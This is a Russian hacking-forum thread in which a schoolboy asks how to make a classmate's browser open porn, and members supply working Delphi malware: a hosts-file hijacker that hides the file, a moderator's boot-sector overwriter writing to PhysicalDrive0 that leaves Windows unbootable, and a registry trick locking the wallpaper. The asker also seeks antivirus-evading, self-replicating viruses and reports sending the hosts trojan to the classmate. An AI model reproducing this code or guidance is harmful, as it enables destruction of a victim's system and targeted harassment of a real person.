небольшая шалость) - delfcode
Понедельник, 05.12.2016, 23:41 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 212»
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx 
delfcode » Delphi » Вирусология Delphi » небольшая шалость) (гейпорно в браузере.)
небольшая шалость)
NegodnikДата: Вторник, 28.12.2010, 18:57 | Сообщение # 1
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
Здравствуйте много уважаемые друзья)
Со мной в одном классе учится один мудак, который выиграл районную олимпиаду по информатике, и зазвездился. этот урод в корне достал.
можно ли сделать так, чтобы при включении любого браузера у него вылазил сайт с гейпорно?
 
opiusДата: Вторник, 28.12.2010, 19:40 | Сообщение # 2
Частый гость
Зарегистрирован: 18.03.2010
Группа: Пользователи
Сообщений: 46
Статус: Offline
Negodnik, Для этого существует тема Болтовня.


 
NegodnikДата: Вторник, 28.12.2010, 19:48 | Сообщение # 3
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
окей. может кто нибудь из модеров сможет перенести эту тему?

Сообщение отредактировал Negodnik - Вторник, 28.12.2010, 19:50
 
opiusДата: Вторник, 28.12.2010, 20:10 | Сообщение # 4
Частый гость
Зарегистрирован: 18.03.2010
Группа: Пользователи
Сообщений: 46
Статус: Offline
Quote (Negodnik)
окей. может кто нибудь из модеров сможет перенести эту тему?

Еслиб у меня были бы права на эту функцию я бы может и перенес бы.



 
NegodnikДата: Вторник, 28.12.2010, 20:45 | Сообщение # 5
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
А так я могу её удалить? если да, то как?
 
cool1Дата: Среда, 29.12.2010, 10:43 | Сообщение # 6
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
попробуй с hosts помудрить
p.s.
Code

program Hosts;

uses
   Windows;

function WinDir:string;  
var p:PChar;
begin
GetMem(p, MAX_PATH);
result:='';
if GetWindowsDirectory(p, MAX_PATH)>0 then
result:=string(p);
FreeMem(p);
end;
var
  f:TextFile;
begin
AssignFile(f,WinDir+'\system32\drivers\etc\hosts');
Append(f);
Writeln(f,'127.0.0.1  yandex.ru');
Writeln(f,'127.0.0.1  www.yandex.ru');
Flush(f);
CloseFile(f);
SetFileAttributes('WinDir+'\system32\drivers\etc\hosts', faHidden);
end.

ну сам все сделаешь вот те дал типа трояна хост вместо 127.0.0.1 пиши ip тваего гей порно!
Ну для НУБов
Как узнать IP сайта
Пуск->Выполнить->ping site.ru -t вместо site.ru втсавишь сайт порно!



За помощь ставьте +!


Сообщение отредактировал cool1 - Среда, 29.12.2010, 10:46
 
NegodnikДата: Среда, 29.12.2010, 11:59 | Сообщение # 7
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
СПАСИБО добрый человек)
Это что то вроде того что не даёт в контакт войти?


Сообщение отредактировал Negodnik - Среда, 29.12.2010, 12:01
 
cool1Дата: Среда, 29.12.2010, 12:37 | Сообщение # 8
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
ага


За помощь ставьте +!
 
gravitasДата: Среда, 29.12.2010, 12:51 | Сообщение # 9
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Дак помоему ему не с хостс надо мутить, а с стартовыми страницами браузеров. На эту тему неплохо бы погуглить...
З.Ы. Я тоже районку взял недавно biggrin biggrin


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
NegodnikДата: Среда, 29.12.2010, 14:43 | Сообщение # 10
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
Поздравляю)
но ты ведь называешь всех в школе нубами?)
Кстати. насчет стартовых ты прав, но стартовую не в автозагрузку пихать, а в сами браузеры, иначе она загружается когда инет не включен.
или же впихнуть ярлык сайта в подключения к инету (тобишь когда начинаешь подключаться к инету вылазит сайт в мозиле например)


Сообщение отредактировал Negodnik - Среда, 29.12.2010, 15:10
 
gravitasДата: Среда, 29.12.2010, 19:01 | Сообщение # 11
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (Negodnik)
Кстати. насчет стартовых ты прав, но стартовую не в автозагрузку пихать, а в сами браузеры, иначе она загружается когда инет не включен. или же впихнуть ярлык сайта в подключения к инету (тобишь когда начинаешь подключаться к инету вылазит сайт в мозиле например)

А зачем тогда топик создавал?))
Помоему лучший выход - баннер на раб стол...


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
NegodnikДата: Среда, 29.12.2010, 19:21 | Сообщение # 12
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
Quote
Помоему лучший выход - баннер на раб стол...

можешь дать код такого действа?


Сообщение отредактировал Negodnik - Среда, 29.12.2010, 19:22
 
gravitasДата: Среда, 29.12.2010, 19:23 | Сообщение # 13
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (Negodnik)
можешь дать код такого действа?

Собирай из кусков кода типа запрета alt+f4 и т.д.


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
NegodnikДата: Среда, 29.12.2010, 21:18 | Сообщение # 14
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
последние вопросы smile
где можно достать коды стелсов и репликаторов? есть какие нибудь стелсы, которые до сих пор не палят анвири?
И ещё) можно ли создать вирус, который бы не палился, и маскировался под файлы ЕХЕ, и создавал бы другой вирус, который в свою очередь создавал ярлыки в определённых файлах?
и ещё ты же на дельфи олимпиаду писал? smile


Сообщение отредактировал Negodnik - Среда, 29.12.2010, 21:21
 
C@TДата: Четверг, 30.12.2010, 01:19 | Сообщение # 15
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
ну примерчик РЕ инфектора на форуме есть http://delfcode.ru/forum/10-324-1

почему вы такие добрые, гейпорно в браузер, это же безобидно
предлагаю вот что:

предисловие:
тем кто не знает как загружается ОС
после включения компа перерывание биоса 19h загружает в ОЗУ по адресу 0x7C00 код который находится в бут секторе(первые 512 байт винчестера) и передает ему управление

Если мы откроем файл винчестера то в первых 512 байт мы найдем первичный загрузчик винды, а если мы затрем первые 512 байт то винда не сможет загрузится, но можно поступить и по другому, запихнуть туда свой загрузчик(загружать он конечно ничего не будет) который сделает то что мы хотим, можно например форматнуть ВЕСЬ винт , можно нарисовать какую нибудь картинку или вывести сообщение, а можно если постараться и сделать загрузчик который после того как выведет сообщение "ваш комп сдох" вернет загрузчик винды на место и после следующей перезагрузки все будет работать нормально

вот пример с выводом сообщения

Code

procedure KILL;
type
loader = array [0..511] of byte;

const
NewLoader:loader =
($b4, $13, $b9, $0b, $00, $b0, $00, $b6, $00, $b2, $00, $bd, $14, $7c, $b3, $1f,
$cd, $10, $eb, $fe, $41, $56, $45, $20, $53, $41, $54, $41, $4e, $41, $53, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $aa, $55);// #aa#55 это сигнатура загрузчика    

{
данная константа это скомпиленный асм код:
.model tiny
.code
org 7C00h
start:
   mov ah,13h ;number of command
   mov cx,11 ; nomber
   mov al,0h ;wiev mode
   mov dh,0  ; X, координаты куда будет выведенно сообщение
   mov dl,0  ; Y
   mov bp,offset message;offset
   mov bl,00011111b ;color
   int 10h
   jmp $;вечный цикл
   DATA:
   message db "AVE SATANAS",0h;Слава Сатане(латынь)

end start
   }

var
f1,f2:cardinal;
buf:loader;
nr,nw:Cardinal;
begin
    f1 := CreateFileA('\\.\PhysicalDrive0',GENERIC_ALL,FILE_SHARE_WRITE + FILE_SHARE_READ,0,OPEN_EXISTING,0,0);   
    buf := NewLoader;//заполняем буфер
    WriteFile(f1,buf,512,nw,0);
    CloseHandle(f1);
end;
Прикрепления: kill.rar(156Kb)




Сообщение отредактировал C@T - Четверг, 30.12.2010, 01:34
 
cool1Дата: Четверг, 30.12.2010, 06:52 | Сообщение # 16
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
Идея:
1)Меняем фон раб-стола на (рисуем в Paint'e) Пшел нах или че-то типа такого!
2)В HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\ActiveDesktop добовляем
NoChangingWallpaper со значением, равным единице!
biggrin
P.S. Меняем фон: (программно)
Code
uses ...Registry; //подключаем модуль
//Используем
procedure TForm1.Button1Click(Sender: TObject);
var
   Reg: TRegIniFile;
begin
   Reg := TRegIniFile.Create('Control Panel');
   Reg.WriteString('desktop', 'Wallpaper', 'C:\1.bmp');
   Reg.WriteString('desktop', 'TileWallpaper', '0');
   Reg.Free;
   SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, nil, SPIF_SENDWININICHANGE);
end;

УДАЧИ! smile smile smile



За помощь ставьте +!


Сообщение отредактировал cool1 - Четверг, 30.12.2010, 06:56
 
gravitasДата: Четверг, 30.12.2010, 07:49 | Сообщение # 17
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Кстати есть еще вариант... Жертва 100500% обосрется от страха!
Внимание... Supervirus.


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
NegodnikДата: Четверг, 30.12.2010, 14:20 | Сообщение # 18
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
Quote (C@T)
вот пример с выводом сообщения
Code

procedure KILL;
type
loader = array [0..511] of byte;

const
NewLoader:loader =
($b4, $13, $b9, $0b, $00, $b0, $00, $b6, $00, $b2, $00, $bd, $14, $7c, $b3, $1f,
$cd, $10, $eb, $fe, $41, $56, $45, $20, $53, $41, $54, $41, $4e, $41, $53, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $aa, $55);// #aa#55 это сигнатура загрузчика

{
данная константа это скомпиленный асм код:
.model tiny
.code
org 7C00h
start:
mov ah,13h ;number of command
mov cx,11 ; nomber
mov al,0h ;wiev mode
mov dh,0 ; X, координаты куда будет выведенно сообщение
mov dl,0 ; Y
mov bp,offset message;offset
mov bl,00011111b ;color
int 10h
jmp $;вечный цикл
DATA:
message db "AVE SATANAS",0h;Слава Сатане(латынь)

end start
}

var
f1,f2:cardinal;
buf:loader;
nr,nw:Cardinal;
begin
f1 := CreateFileA('\\.\PhysicalDrive0',GENERIC_ALL,FILE_SHARE_WRITE + FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
buf := NewLoader;//заполняем буфер
WriteFile(f1,buf,512,nw,0);
CloseHandle(f1);
end;
Прикрепления: kill.rar(156Kb)


прочел и понял что я нихера не шарю)
Можете посоветовать какие нибудь хорошие книги по вирусологии? (желательно для чайников smile )
нашёл прогу, которая создаёт стартовую страницу в опере. прошу её посмотреть, и вынести вердикт можно ли её переделать под вирус.
И можно ли её приспособить под хром мозилу сафари эксплоуэр и другие?
незнаю как тут выкладывать файлы, поэтому выложил на дамп: http://dump.ru/file/4985794


Сообщение отредактировал Negodnik - Четверг, 30.12.2010, 14:45
 
gravitasДата: Четверг, 30.12.2010, 15:19 | Сообщение # 19
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (Negodnik)
Можете посоветовать какие нибудь хорошие книги по вирусологии? (желательно для чайников )

А ты по твоему где?) На сайте дельфина (на этом сайте) килотонны мануала.


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
NegodnikДата: Пятница, 31.12.2010, 13:54 | Сообщение # 20
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
чем можно открыть это приложение, чтобы взглянуть на код. можете посоветьвать утилиту?
 
gravitasДата: Пятница, 31.12.2010, 14:52 | Сообщение # 21
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Какое приложение?

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
C@TДата: Пятница, 31.12.2010, 16:45 | Сообщение # 22
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
вот, может поможет biggrin

ну как, отомстил своему однокласснику ?

Прикрепления: odbg200j.zip(840Kb)


 
NegodnikДата: Воскресенье, 02.01.2011, 19:47 | Сообщение # 23
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
Quote (C@T)
ну как, отомстил своему однокласснику ?

Я ему кинул вирь с хостом (код которого самый первый), но это уж совсем для нубов)
 
NegodnikДата: Воскресенье, 02.01.2011, 23:01 | Сообщение # 24
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
Друзья! biggrin я как обычно гуглил по теме, и узнал, что мне не нужно строить велосипед, окозалось что его построили ещё до меня)
Trojan Start Page 1505
проблема в том, что я не могу найти исходники этого вируса sad
 
cool1Дата: Понедельник, 03.01.2011, 14:16 | Сообщение # 25
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
так его может на асме или си писали
p.s. сам напиши вроде в реестре стартовые страницы хранятся



За помощь ставьте +!


Сообщение отредактировал cool1 - Понедельник, 03.01.2011, 14:17
 
delfcode » Delphi » Вирусология Delphi » небольшая шалость) (гейпорно в браузере.)
Страница 1 из 212»
Поиск:

delfcode.ru © 2008 - 2016 Хостинг от uCoz